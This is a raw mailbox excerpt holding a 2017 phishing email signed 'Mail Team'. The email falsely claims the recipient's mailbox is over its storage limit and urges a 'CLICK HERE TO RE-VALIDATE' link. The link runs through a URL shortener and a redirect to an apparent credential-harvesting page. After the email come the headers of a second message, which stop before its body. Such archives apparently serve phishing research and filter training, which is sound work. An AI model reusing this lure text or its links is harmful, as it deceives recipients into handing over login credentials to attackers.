From: "Mail Team" <oyshiqul.haque@hrcigw.com>
Date: Mon, 12 Jun 2017 11:30:07 +0100
Message-Id: <20170612103049.67412164D36@mx.hrcigw.com>
Status: O
X-Status: 
X-Keywords:                  
X-UID: 219

You will not see this in a MIME-aware mail reader.
--===============1673434456==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

Dear user,  =

 Your Mail-box. has exceeded the storage limit. You can not send or receive=
 new messages until you Re-validate your mail.   To RE-validate the Mailbox=
     CLICK HERE TO RE-VALIDATE   Thank you!    Mail Server!
--===============1673434456==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><DIV style=3D"FONT-SIZE: 12px; FONT-FAMILY: ca=
libri,arial,helvetica,sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; T=
EXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0); PADDING-BOTTOM=
: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px=
; LETTER-SPACING: normal; PADDING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255=
,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps:=
 normal; text-decoration-style: initial; text-decoration-color: initial; fo=
nt-stretch: normal">Dear user,&nbsp;</DIV>
<DIV style=3D"FONT-SIZE: 12px; FONT-FAMILY: calibri,arial,helvetica,sans-se=
rif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEI=
GHT: normal; COLOR: rgb(0,0,0); PADDING-BOTTOM: 0px; FONT-STYLE: normal; PA=
DDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; LETTER-SPACING: normal; PAD=
DING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font=
-variant-ligatures: normal; font-variant-caps: normal; text-decoration-styl=
e: initial; text-decoration-color: initial; font-stretch: normal"><BR id=3D=
m_-4436554952370612163gmail-m_6790157192935764572gmail-m_-73558631864955476=
2gmail-m_-8901102345052377459gmail-m_-6431152562989576477gmail-m_-720299779=
7137823708gmail-m_-3041519381834134702m_-1438066610917654538gmail-yiv238878=
8442yui_3_16_0_ym19_1_1489625580346_39626 clear=3Dnone>&nbsp;Your Mail-box.=
 has exceeded the storage limit.&nbsp;You can not send or receive new messa=
ges until you Re-validate your mail.</DIV>
<DIV style=3D"FONT-SIZE: 12px; FONT-FAMILY: calibri,arial,helvetica,sans-se=
rif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEI=
GHT: normal; COLOR: rgb(0,0,0); PADDING-BOTTOM: 0px; FONT-STYLE: normal; PA=
DDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; LETTER-SPACING: normal; PAD=
DING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font=
-variant-ligatures: normal; font-variant-caps: normal; text-decoration-styl=
e: initial; text-decoration-color: initial; font-stretch: normal">&nbsp;</D=
IV>
<DIV id=3Dm_-4436554952370612163gmail-m_6790157192935764572gmail-m_-7355863=
18649554762gmail-m_-8901102345052377459gmail-m_-6431152562989576477gmail-m_=
-7202997797137823708gmail-m_-3041519381834134702m_-1438066610917654538gmail=
-yiv2388788442yui_3_16_0_ym19_1_1489625580346_39628 style=3D"FONT-SIZE: 12p=
x; FONT-FAMILY: calibri,arial,helvetica,sans-serif; WHITE-SPACE: normal; WO=
RD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,=
0); PADDING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT=
: 0px; MARGIN: 0px; LETTER-SPACING: normal; PADDING-RIGHT: 0px; BACKGROUND-=
COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; =
font-variant-caps: normal; text-decoration-style: initial; text-decoration-=
color: initial; font-stretch: normal"><FONT id=3Dm_-4436554952370612163gmai=
l-m_6790157192935764572gmail-m_-735586318649554762gmail-m_-8901102345052377=
459gmail-m_-6431152562989576477gmail-m_-7202997797137823708gmail-m_-3041519=
381834134702m_-1438066610917654538gmail-yiv2388788442yui_3_16_0_ym19_1_1489=
625580346_39629>To RE-validate the Mailbox&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</F=
ONT><A id=3Dm_-4436554952370612163gmail-m_6790157192935764572gmail-m_-73558=
6318649554762gmail-m_-8901102345052377459gmail-m_-6431152562989576477gmail-=
m_-7202997797137823708gmail-m_-3041519381834134702m_-1438066610917654538gma=
il-yiv2388788442yui_3_16_0_ym19_1_1489625580346_39630 style=3D"TEXT-DECORAT=
ION: none; COLOR: rgb(17,85,204)" href=3D"http://flyt.it/NZ1XR1" shape=3Dre=
ct rel=3Dnofollow target=3D_blank data-saferedirecturl=3D"https://www.googl=
e.com/url?hl=3Den&amp;q=3Dhttp://emergeplc.com/dames/daum/daum.htm&amp;sour=
ce=3Dgmail&amp;ust=3D1497341146634000&amp;usg=3DAFQjCNHLdJ-Vt21Qh7t64w5G3zI=
MAAa28Q">CLICK HERE TO RE-VALIDATE</A></DIV>
<DIV style=3D"FONT-SIZE: 12px; FONT-FAMILY: calibri,arial,helvetica,sans-se=
rif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEI=
GHT: normal; COLOR: rgb(0,0,0); PADDING-BOTTOM: 0px; FONT-STYLE: normal; PA=
DDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; LETTER-SPACING: normal; PAD=
DING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font=
-variant-ligatures: normal; font-variant-caps: normal; text-decoration-styl=
e: initial; text-decoration-color: initial; font-stretch: normal">&nbsp;</D=
IV>
<DIV id=3Dm_-4436554952370612163gmail-m_6790157192935764572gmail-m_-7355863=
18649554762gmail-m_-8901102345052377459gmail-m_-6431152562989576477gmail-m_=
-7202997797137823708gmail-m_-3041519381834134702m_-1438066610917654538gmail=
-yiv2388788442yui_3_16_0_ym19_1_1489625580346_39631 style=3D"FONT-SIZE: 12p=
x; FONT-FAMILY: calibri,arial,helvetica,sans-serif; WHITE-SPACE: normal; WO=
RD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,=
0); PADDING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT=
: 0px; MARGIN: 0px; LETTER-SPACING: normal; PADDING-RIGHT: 0px; BACKGROUND-=
COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; =
font-variant-caps: normal; text-decoration-style: initial; text-decoration-=
color: initial; font-stretch: normal">Thank you!&nbsp;</DIV>
<DIV style=3D"FONT-SIZE: 12px; FONT-FAMILY: calibri,arial,helvetica,sans-se=
rif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEI=
GHT: normal; COLOR: rgb(0,0,0); PADDING-BOTTOM: 0px; FONT-STYLE: normal; PA=
DDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; LETTER-SPACING: normal; PAD=
DING-RIGHT: 0px; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font=
-variant-ligatures: normal; font-variant-caps: normal; text-decoration-styl=
e: initial; text-decoration-color: initial; font-stretch: normal">&nbsp;</D=
IV>
<DIV id=3Dm_-4436554952370612163gmail-m_6790157192935764572gmail-m_-7355863=
18649554762gmail-m_-8901102345052377459gmail-m_-6431152562989576477gmail-m_=
-7202997797137823708gmail-m_-3041519381834134702m_-1438066610917654538gmail=
-yiv2388788442yui_3_16_0_ym19_1_1489625580346_39631 style=3D"FONT-SIZE: 12p=
x; FONT-FAMILY: calibri,arial,helvetica,sans-serif; WHITE-SPACE: normal; WO=
RD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,=
0); PADDING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT=
: 0px; MARGIN: 0px; LETTER-SPACING: normal; PADDING-RIGHT: 0px; BACKGROUND-=
COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; =
font-variant-caps: normal; text-decoration-style: initial; text-decoration-=
color: initial; font-stretch: normal">Mail Server!</DIV></BODY></HTML>
--===============1673434456==--

From jose@monkey.org Mon Jun 12 12:58:50 2017 +0000
Return-Path: j.mackness2@uos.ac.uk
Delivered-To: jose@monkey.org
X-FDA: 72943399620.25.goose59_300005d54d115
X-Spam-Summary: 20,1.5,0,b1543ffd573d3458,d41d8cd98f00b204,j.mackness2@uos.ac.uk,:j.mackness2@uos.ac.uk,RULES_HIT:1:2:10:41:72:334:355:368:369:379:582:599:901:960:962:966:967:969:973:978:983:988:989:1152:1158:1189:1208:1221:1260:1261:1263:1313:1314:1345:1359:1381:1431:1436:1437:1516:1517:1518:1575:1588:1589:1592:1594:1730:1777:1792:2196:2199:2525:2527:2553:2557:2561:2566:2682:2685:2859:2892:2894:2895:2900:2924:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3352:3586:3642:3740:3865:3866:3867:3868:3870:3871:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4038:4050:4321:4385:4659:4860:4886:5007:6117:6261:6650:6684:6703:7652:7903:8603:8957:9025:9040:9121:9149:9164:9165:9388:9855:10009:10128:10205:10346:11233:11473:11537:11656:11657:11658:11788:11805:11854:11855:11875:11914:12043:12291:12438:12519:12521:12555:12679:12683:12986:13005:13017:13018:13019:13129:13139:13231:13237:13439:13870:13893:13972:14096:14472:14659:14935:21067:21080:21364:
X-HE-Tag: goose59_300005d54d115
X-Filterd-Recvd-Size: 12982
Received: from mail1.bemta5.messagelabs.com (mail1.bemta5.messagelabs.com [195.245.231.153])
	by imf20.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 12 Jun 2017 12:58:49 +0000 (UTC)
Return-Path: <J.Mackness2@uos.ac.uk>
Received: from [85.158.139.51] by server-17.bemta-5.messagelabs.com id 2A/0D-19466-DEF8E395; Mon, 12 Jun 2017 12:58:21 +0000
X-Brightmail-Tracker: H4sIAAAAAAAAA1VTa0yTVxjmfLd+Grp9FAhnRKfWaBZNmWxB3iz
  qLsm2T50ZmVsi/NhWtkqbtIW0uLBlRkBcWEFAEEbLJQXKXbyAgpMOuQ0cFpSLwibjNpFRZCxF
  0CHWfZ+dys6v5zzP8z7POT9elpQlsYGsKi5WZdArtXJmNdUa5shVzKTvCt921fU6zLf9hqCrc
  IqA5bvLFEw7+yVQPl5DQX1GOgJHsVUCXfkNBHxf+A44nXUklFQN0pBirqNg6vQiDSWP7ATYl8
  0M/Bh/g4S8lAgoL7IyMFpWJoFfL5wiwGbJJuDnTqGh4qhbArPJbRKYGL9LwYP2FgZsZ5w0TJj
  6Gai+cpGCgetjEhh27Iei1AIaTp8pJsB0Yp6GGxeGSZiqKWSgpqiWBndvIFTdSaGgbZKE5tER
  Eh5YOhC47o9SUFl4XwJTl48zUGCfkUB/QhkFZ+2LJLTU5FBwybITHA/zEZgKxxlYaF8mwHpil
  AHr7EkGHNlzNJRWXBY+2D2JoOOvxxRU5LoouOUU0m8OlxLwd70MctKzybci+DznbcT3D+zlO8
  e6ab5poonkRxsrJXx68Rji2ycdFN9ZvkTwSc7tfOb4DMGbb/Ug/nxCFsFXLh1HfItrFvGTLW6
  aT2pMo8M+jKA1+sjouM9ptaUqJsYWGpf5uB7Fo6TXTGg1K+POIfxntYP2XBoRLihJkZjQKpbh
  XsV3GmeRiP04BS4p/Y4QsS+3Bp9zWQkPvxb3DqUKHlbAb+A5V4hIU9wmnFecRYpYyn2Aj5nqS
  E/+cYSrmxdo0b+K24drz24VPUiIuZdQ/cRPcgE48V4lLWLMcdhmv0Z6sD+e/sP9H78eLyUmPq
  klOT1uHlnvqfLBv5hvUyKWcXJcMT3HZCBfy4pUy/MJy4oJjyUID2WfZDx4Ky4rmiE9WIFz3a3
  USt6KJFXoFaPK8JXKoAgODYo0aKLUsTqlRqsI3hYSpFMZjcoolVYZaQz6IlpXi4Tt8BLORdR7
  dXcreokl5P7S8wM7wmUvREZ/+bVaaVR/ZjikVRlb0RqWlWNpUdqucJmPQRWlijuo0Qor9lTGr
  LfcT1pwWJClxhilzqiJ8khdaENggDRNnONEQX1I/2zs6XL2obWBvlIkPETmHaMy6DSx/9edKI
  BFcl+pVkzx1uhjn6U7hWJCKB4U3yw1xiqfS4HxSNm0cKA77eXNH6XY7A2h6+L25C+dSur5JNJ
  7T6/f5nT9/MLgplzpkW/l5t+ZvfjgvpzyK1veffvR0arrN3/Q+JjfD/Pa4cV++l6m/9Q3WdUN
  G919yX09Q5nDCQf252Us/rM79Yii0d67cwOjtQWtO/bTyJsjrmsvbv84RLfxUl3Www5F8mE5Z
  VQrg7eQBqPyX9m/qceXBAAA
X-Env-Sender: J.Mackness2@uos.ac.uk
X-Msg-Ref: server-10.tower-180.messagelabs.com!1497272299!98066106!1
X-Originating-IP: [194.80.204.152]
X-StarScan-Received:
X-StarScan-Version: 9.4.19; banners=uos.ac.uk,-,-
X-VirusChecked: Checked
Received: (qmail 15349 invoked from network); 12 Jun 2017 12:58:19 -0000
Received: from unknown (HELO MAILEDGEPRD01.ucs.ac.uk) (194.80.204.152)
  by server-10.tower-180.messagelabs.com with DHE-RSA-AES256-SHA encrypted SMTP; 12 Jun 2017 12:58:19 -0000
Received: from MAILDBPRD01.UCS.AC.UK (10.135.2.240) by MAILEDGEPRD01.ucs.ac.uk
 (194.80.204.152) with Microsoft SMTP Server (TLS) id 14.3.319.2; Mon, 12 Jun
 2017 13:58:18 +0100
Received: from MAILDBPRD02.UCS.AC.UK ([fe80::94c1:b264:9f99:87d9]) by
 MAILDBPRD01.UCS.AC.UK ([fe80::1d1b:952a:b6f6:3012%16]) with mapi id
 14.03.0319.002; Mon, 12 Jun 2017 13:58:19 +0100
